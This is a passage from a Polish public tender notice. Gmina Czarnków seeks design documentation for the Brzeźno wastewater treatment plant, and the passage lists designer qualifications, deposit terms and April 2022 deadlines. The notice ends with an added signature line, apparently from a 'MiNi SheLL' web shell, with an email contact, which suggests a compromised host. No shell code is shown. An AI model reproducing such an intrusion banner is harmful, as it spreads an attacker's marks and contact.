osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności elektrycznej, który posiada wykształcenie minimum<br/>średnie, staż pracy min. 3 letni<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności architektonicznej, który posiada wykształcenie minimum<br/>średnie, staż pracy min. 3 letni<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności konstrukcyjno-budowlanej, który posiada wykształcenie<br/>minimum średnie, staż pracy min. 3 letni<br/>legitymującymi się uprawnieniami wydawanymi na podstawie Rozporządzenia Ministra<br/>Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego<br/>do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. 2019 poz.<br/>831) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie<br/>wcześniej obowiązujących przepisów, lub odpowiadające im uprawnienia budowlane,<br/>które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz<br/>Konfederacji szwajcarskiej w szczególności na podstawie przepisów:<br/>- ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r. poz. 220, z<br/>2021 r. poz. 78);<br/>- ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa (t.j. Dz. U. z 2019 r. poz. 1117.),<br/>- ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa, dotyczące świadczenia usług transgranicznych;<br/>z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (t.j. Dz. U. z<br/>2020 r. poz. 1333 ze zm.), wraz z informacjami na temat ich uprawnień, doświadczenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Spełnianie warunku wykonawca potwierdzi poprzez złożenie wykazu osób zdolnych do<br/>wykonania zamówienia wg załącznika nr 5 do SWZ. Zamawiający dokona oceny na<br/>zasadzie spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych w okresie ostatnich trzech lat, przed dniem składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonanie minimum 3<br/>dokumentacji projektowych budowy lub przebudowy/modernizacji oczyszczalni ścieków<br/>o przepustowości min. 300 m3/d; co potwierdzi w wykazie wykonanych usług, ich<br/>wartości, daty, miejsca wykonania i podmiotów, na rzecz których usługi te zostały<br/>wykonane, z załączeniem dowodów potwierdzających, że zostały one wykonane<br/>należycie, przy czym dokumentami potwierdzającymi, o których mowa, są referencje<br/>bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Wykaz osób zdolnych do wykonania zamówienia tj.:<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności sanitarnej, który posiada wykształcenie minimum średnie,<br/>staż pracy min. 3 letni i wykonał minimum 1 projekt budowy/przebudowy oczyszczalni<br/>ścieków o przepustowości min. 300 m3/d<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności elektrycznej, który posiada wykształcenie minimum<br/>średnie, staż pracy min. 3 letni<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności architektonicznej, który posiada wykształcenie minimum<br/>średnie, staż pracy min. 3 letni<br/>-1 osobę pełniącą funkcję projektanta z uprawnieniami bez ograniczeń do<br/>projektowania w specjalności konstrukcyjno-budowlanej, który posiada wykształcenie<br/>minimum średnie, staż pracy min. 3 letni</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem<br/>terminu składania ofert, wnieść wadium w kwocie: 5 000zł (słownie: pięć tysięcy<br/>złotych).<br/>2) Wadium musi obejmować pełen okres związania ofertą tj. do dnia 18 maja 2022r.<br/>3) Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7<br/>ustawy Pzp. a mianowicie:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w Banku<br/>Spółdzielczym w Czarnkowie, Nr rachunku: 75 8951 0009 0000 0954 2000 0150 podając w<br/>tytule przelewu: &#34;Modernizacja istniejącej oczyszczalni ścieków w Brzeźnie –<br/>dokumentacja techniczna” wraz z uzyskaniem pozwolenia na budowę oraz pełnieniem<br/>nadzoru autorskiego.<br/>Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej<br/>przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy<br/>Zamawiającego).<br/>4) Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty<br/>w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym<br/>podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać<br/>następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (Zamawiającego),<br/>gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym<br/>w gwarancji lub poręczeniu musi być Gmina Czarnków, ul. Rybaki 3,<br/>64-700 Czarnków<br/>23<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia<br/>bezwarunkowo, na pierwsze pisemne żądanie Zamawiającego, w sytuacjach<br/>określonych w art. 98 ust. 6 ustawy Pzp.<br/>5) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób<br/>nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu<br/>związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa<br/>w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226<br/>ust. 1 pkt 14 ustawy Pzp.<br/>6) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5<br/>ustawy Pzp.<br/>7) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6<br/>ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określone w załączniku nr 9 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_czarnkow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-22 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com